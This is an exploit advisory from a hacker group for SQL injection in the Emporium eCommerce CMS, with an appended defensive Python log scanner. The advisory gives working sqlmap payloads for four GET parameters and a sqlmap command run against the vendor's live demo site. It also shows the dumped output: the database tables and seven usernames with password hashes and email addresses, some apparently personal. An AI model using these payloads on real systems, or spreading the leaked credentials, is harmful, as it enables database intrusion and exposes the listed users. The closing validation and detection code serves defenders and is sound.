CraCkEr - THE CRACK OF ETERNAL MIGHT
From The Ashes and Dust Rises An Unimaginable crack....

[ Exploits ]

Author    : CraCkEr
Website   : mybizcms.com
Vendor    : mybizcms
Software  : Emporium eCommerce - Online Shopping CMS v 1.2
Vuln Type : Remote SQL Injection
Method    : GET
Critical  : High [░░▒▒▓▓██]
Impact    : Database Access

Emporium eCommerce is a complete online shopping platform for all your needs.

B4nks-NET irc.b4nks.tk #unix

Release Notes:
==============
Typically used for remotely exploitable vulnerabilities that can lead to system compromise.

Greets: Phr33k, NK, GoldenX, Wehla, Cap, ZARAGAGA, DarkCatSpace, R0ot, KnG, Centerk loool, DevS, Dark-Gost
CryptoJob (Twitter) twitter.com/CryptozJob

© CraCkEr 2022

There are 4 parameters vulnerable to SQL Injection in /categories/other-categories?
GET parameter 'min_price' is vulnerable
---
Parameter: min_price (GET)
    Type: error-based
    Title: MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)
    Payload: min_price=(UPDATEXML(5880,CONCAT(0x2e,0x7176787a71,(SELECT (ELT(5880=5880,1))),0x716b707071),2936))&max_price=145000&storage[]=41

    Type: time-based blind
    Title: MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)
    Payload: min_price=(SELECT 3031 FROM (SELECT(SLEEP(5)))qWqF)&max_price=145000&storage[]=41
---

GET parameter 'percentage' is vulnerable
---
Parameter: percentage (GET)
    Type: boolean-based blind
    Title: MySQL boolean-based blind - Parameter replace (MAKE_SET)
    Payload: percentage=MAKE_SET(4728=4728,5649)

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: percentage=40 AND (SELECT 8890 FROM(SELECT COUNT(*),CONCAT(0x7170706b71,(SELECT (ELT(8890=8890,1))),0x717a707671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: percentage=40 AND (SELECT 9724 FROM (SELECT(SLEEP(5)))chdS)
---

GET parameter 'review_ratings' is vulnerable
---
Parameter: review_ratings (GET)
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: review_ratings=4 AND (SELECT 5450 FROM(SELECT COUNT(*),CONCAT(0x7170706b71,(SELECT (ELT(5450=5450,1))),0x717a707671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: review_ratings=4 AND (SELECT 2340 FROM (SELECT(SLEEP(5)))lpXn)
---

GET parameter 'brand[]' is vulnerable
---
Parameter: brand[] (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: brand[]=15') AND 3512=3512 AND ('Othl'='Othl

    Type: stacked queries
    Title: MySQL >= 5.0.12 stacked queries (comment)
    Payload: brand[]=15');SELECT SLEEP(5)#

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: brand[]=15') AND (SELECT 9038 FROM (SELECT(SLEEP(5)))hyaE) AND ('KJgc'='KJgc
---

Live Demo Site: https://mybizcms.com/demos/multivendor/

[+] Starting the Attack

sqlmap.py -u "https://mybizcms.com/demos/multivendor/categories/other-categories?brand%5B%5D=15" --current-db --batch --random-agent

[INFO] the back-end DBMS is MySQL
web application technology: Apache, PHP 7.3.33, PHP
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[INFO] fetching current database
current database: 'mybizcms_multivendor'
fetching tables for database: 'mybizcms_multivendor'
[101 tables]
+--------------------------+
| returns                  |
| ad_placements            |
| addresses                |
| ads                      |
| attribute_items          |
| attributes               |
| authorize_net_settings   |
| brands                   |
| categories               |
| collections              |
| company                  |
| counties                 |
| countries                |
| credit_card_types        |
| cronjobs                 |
| customers                |
| deliveries               |
| delivery_items           |
| delivery_options         |
| delivery_status          |
| discounts                |
| email_templates          |
| facebook_settings        |
| faqs                     |
| flash_sale_items         |
| flash_sales              |
| flutterwave_settings     |
| github_settings          |
| google_settings          |
| item_status              |
| labels                   |
| linkedin_settings        |
| logs                     |
| media                    |
| mpesa_settings           |
| newsletters              |
| notifications            |
| options                  |
| order_details            |
| order_items              |
| order_status             |
| orders                   |
| pages                    |
| payment_options          |
| payment_status           |
| payments                 |
| payout_modes             |
| payout_status            |
| payouts                  |
| paypal_pro_settings      |
| paypal_standard_settings |
| paytm_settings           |
| payu_money_settings      |
| permissions              |
| pesapal_settings         |
| pickup_stations          |
| post_categories          |
| post_comments            |
| posts                    |
| product_attributes       |
| product_images           |
| product_reviews          |
| product_stock            |
| product_types            |
| product_variants         |
| product_wholesales       |
| products                 |
| quicks                   |
| return_reasons           |
| return_status            |
| rewards                  |
| role_sub_permissions     |
| roles                    |
| saved_items              |
| sessions                 |
| shipping_fees            |
| shipping_regions         |
| shipping_weights         |
| shops                    |
| sliders                  |
| stripe_settings          |
| sub_permissions          |
| subscribers              |
| supported_currencies     |
| tags                     |
| taxes                    |
| temp_data                |
| ticket_priority          |
| ticket_replies           |
| ticket_status            |
| tickets                  |
| timezones                |
| twitter_settings         |
| twocheckout_settings     |
| user_status              |
| user_sub_permissions     |
| users                    |
| variant_choices          |
| variant_options          |
| wallets                  |
| weights                  |
+--------------------------+

fetching columns for table 'users' in database 'mybizcms_multivendor'
Table: users
[34 columns]
+------------------------+--------------+
| Column                 | Type         |
+------------------------+--------------+
| calling_code           | varchar(11)  |
| city                   | varchar(100) |
| company                | varchar(100) |
| country_id             | int(11)      |
| date_added             | datetime     |
| default_billing        | int(11)      |
| default_currency       | int(11)      |
| default_language       | varchar(40)  |
| default_shipping       | int(11)      |
| department_id          | int(11)      |
| email                  | varchar(100) |
| firstname              | varchar(50)  |
| last_ip                | varchar(40)  |
| last_login             | datetime     |
| last_password_change   | datetime     |
| lastname               | varchar(50)  |
| latitude               | varchar(300) |
| longitude              | varchar(300) |
| new_pass_key_requested | datetime     |
| passkey                | varchar(32)  |
| password               | varchar(256) |
| payout_address         | longtext     |
| payout_mode_id         | int(11)      |
| phone                  | varchar(30)  |
| postal_code            | varchar(100) |
| profile_image          | varchar(150) |
| role_id                | int(11)      |
| state                  | varchar(50)  |
| street                 | varchar(100) |
| user_id                | int(11)      |
| user_status_id         | int(11)      |
| user_uid               | varchar(50)  |
| username               | varchar(100) |
| zip_code               | varchar(15)  |
+------------------------+--------------+

fetching entries of column(s) 'email,password,username' for table 'users' in database 'mybizcms_multivendor'
Database: mybizcms_multivendor
Table: users
[7 entries]
+----------+--------------------------------------------------------------+------------------------+
| username | password                                                     | email                  |
+----------+--------------------------------------------------------------+------------------------+
| admin    | $2y$10$G1DsE2VvjMDBFvozlWr.X.H1dq.UgNhTYSrMHGftuollcDDr9OA2m | admin@mybizcms.com     |
| one      | $2y$10$G1DsE2VvjMDBFvozlWr.X.H1dq.UgNhTYSrMHGftuollcDDr9OA2m | evanskynot25@gmail.com |
| two      | $2y$10$K27UTI0KPeP.N.6EzxED6eVgU6jcAJDq8vf.EuCxzGSEFdSyI/oeC | jdoe@gmail.con         |
| umuruviq | $2y$10$SID3yybe763.xosi8qwqkOTG8baLQQpIVdfrYzqG9dTPhcTtVL5Bu | sync@mybizcms.com      |
| three    | $2y$10$iBnMAPE.3FDeivo2kYPhSerMS05TmbIZQ/bLD6FcmvCowStICaaw. | tew@gmail.com          |
| user     | $2y$10$eZ0/eOZ5R.Mwju4nCqIgHuaVnBosugt8ADjwMCDzQP6oUUH2l5NVK | user@mybizcms.com      |
| tbjjrhls | $2y$10$XKA6hBkZlCAU3T7KcQm.7ubs06COQH4mCcGHmBMwzyYp016oBYoPe | vendor@mybizcms.com    |
+----------+--------------------------------------------------------------+------------------------+

[-] Done
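Every parameter the advisory lists (min_price, percentage, review_ratings, brand[]) is a numeric filter on a category page, which makes this class of bug easy to both prevent and spot: a value that is not a plain number has no business reaching the query. The script below is an added example written for defenders; it is not part of the advisory and not code from the Emporium eCommerce project. It applies that allow-list check to the query string of requests to /categories/other-categories, and runs it over constructed Apache-style log lines (two of which carry payloads quoted in the advisory) to show how an analyst could find this activity in access logs after the fact. Treating max_price and storage[] as numeric, and the log format itself, are assumptions; the advisory only names the endpoint, the parameters and the payload families.

```python
import re
from typing import Dict, List
from urllib.parse import parse_qs, urlsplit

# Path named in the advisory.
ENDPOINT = "/categories/other-categories"

# Filter parameters the advisory names (min_price, percentage, review_ratings,
# brand[]) plus the two that appear inside its payload strings (max_price,
# storage[]). Treating all of them as plain numbers is an assumption about the
# application; the advisory does not describe their expected types.
NUMERIC_PARAMS = {"min_price", "max_price", "percentage",
                  "review_ratings", "brand[]", "storage[]"}
NUMERIC = re.compile(r"\d+(\.\d{1,2})?")

# Payload families present in the advisory's sqlmap output, ordered so that a
# stacked query (which also contains SLEEP) is labelled as stacked.
FAMILIES = [
    ("stacked queries",     re.compile(r";\s*SELECT\b", re.I)),
    ("time-based blind",    re.compile(r"\bSLEEP\s*\(", re.I)),
    ("error-based",         re.compile(r"\bUPDATEXML\s*\(|FLOOR\s*\(\s*RAND", re.I)),
    ("boolean-based blind", re.compile(r"\bMAKE_SET\s*\(|\bAND\s+\d+\s*=\s*\d+", re.I)),
]

# Apache combined-log prefix: client, identity, user, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Constructed sample log lines (not from the advisory or any real server).
# Lines 2 and 3 carry payloads quoted in the advisory, URL-encoded as a client would send them.
SAMPLE_LOG = """\
203.0.113.10 - - [01/Jan/2022:10:00:01 +0000] "GET /categories/other-categories?min_price=100&max_price=145000&storage%5B%5D=41 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.10 - - [01/Jan/2022:10:00:02 +0000] "GET /categories/other-categories?min_price=(UPDATEXML(5880,CONCAT(0x2e,0x7176787a71,(SELECT%20(ELT(5880=5880,1))),0x716b707071),2936))&max_price=145000 HTTP/1.1" 500 312 "-" "Mozilla/5.0"
203.0.113.10 - - [01/Jan/2022:10:00:03 +0000] "GET /categories/other-categories?brand%5B%5D=15%27)%3BSELECT%20SLEEP(5)%23 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.10 - - [01/Jan/2022:10:00:04 +0000] "GET /categories/other-categories?brand%5B%5D=15&brand%5B%5D=22&percentage=40&review_ratings=4 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
"""


def invalid_filter_values(query: str) -> Dict[str, List[str]]:
    """Map each numeric filter parameter to the values that are not plain numbers.

    parse_qs URL-decodes names and values, so brand%5B%5D arrives as brand[] and
    repeated keys (brand[]=15&brand[]=22) become a list. This is the same check
    the application should apply before a value gets anywhere near SQL.
    """
    bad: Dict[str, List[str]] = {}
    for name, values in parse_qs(query, keep_blank_values=True).items():
        if name in NUMERIC_PARAMS:
            wrong = [v for v in values if not NUMERIC.fullmatch(v)]
            if wrong:
                bad[name] = wrong
    return bad


def classify(value: str) -> str:
    """Label a rejected value with the sqlmap technique family it resembles, for triage."""
    for family, pattern in FAMILIES:
        if pattern.search(value):
            return family
    return "unclassified"


def scan_log(text: str) -> List[dict]:
    """Return one finding per request to ENDPOINT whose filter values fail validation."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m.group("target"))
        if parts.path != ENDPOINT:
            continue
        bad = invalid_filter_values(parts.query)
        if bad:
            first_bad = next(iter(bad.values()))[0]
            findings.append({
                "ip": m.group("ip"),
                "ts": m.group("ts"),
                "status": int(m.group("status")),
                "params": bad,
                "family": classify(first_bad),
            })
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['ts']} {f['ip']} status={f['status']} {f['family']}: {f['params']}")
```

Run as-is it reports the second and third sample lines only: the benign requests, including the one with two brand[] values, pass the allow-list. The 500 status on the error-based line is worth keeping in the finding, because a burst of 5xx responses on a filter endpoint is often the first signal of this technique even when the log has been rotated past the payloads. The allow-list is the mitigation, not a substitute for parameterised queries; prepared statements with typed placeholders are what stops injection even when validation is bypassed.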